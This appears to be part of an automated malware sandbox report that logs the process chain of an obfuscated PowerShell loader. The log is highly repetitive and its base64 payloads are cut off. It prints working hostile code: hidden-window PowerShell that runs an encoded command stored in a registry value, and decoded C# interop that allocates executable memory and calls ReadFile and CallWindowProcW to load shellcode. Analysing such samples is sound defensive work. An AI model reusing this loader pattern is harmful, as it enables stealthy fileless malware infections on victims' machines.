$Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" $Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" $Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" $Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" $Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #agry Scriven systemko Tredje5 Chromi8 BIBL Overstre7 prec Forligsin2 Benefit Apotheosiz udetil LOOSE Brneve9 Tonsi2 Tropis Pleuroli4 blkk Cystice Underrepor1 Proculcat PASTOR Sang combaronfo ompr Damned8 NEPH Fruitivere DEFAITIS Miskende5 Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Scriptere1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Scriptere6,ref Int32 Theoriser2,int AUTOACTIVE,ref Int32 Scriptere,int Lejni6,int Scriptere7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Pseu4,uint linjer,int STRY,int Scriptere0,int SEERNE,int Pacificer7,int Advisens9);[DllImport("kernel32.dll")]public static extern int ReadFile(int AUTOACTIVE0,uint AUTOACTIVE1,IntPtr AUTOACTIVE2,ref Int32 AUTOACTIVE3,int AUTOACTIVE4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr AUTOACTIVE5,int AUTOACTIVE6,int AUTOACTIVE7,int AUTOACTIVE8,int AUTOACTIVE9);}"@#refr Cancerinco Linguatul heale LEVIGAT LIGKISTE svovl platonismm Opdrifts Test-Path "inte" Test-Path "Haandboldh6" $Scriptere3=0;$Scriptere9=1048576;$Scriptere8=[Scriptere1]::NtAllocateVirtualMemory(-1,[ref]$Scriptere3,0,[ref]$Scriptere9,12288,64)#Obligat Opskrerfrs Desor6 GRUPPEMED LIVSKVA stersst Actionar6 Anarthro1 Wampanoagm7 Regnvejr7 koebtfurze Cornless3 Bryghusea Nightime baalta cyclo Sinds3 PLADELAGE Skinnebe6 Zweckscop9 teutoniz Assessore renas VEAL PRSI Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGk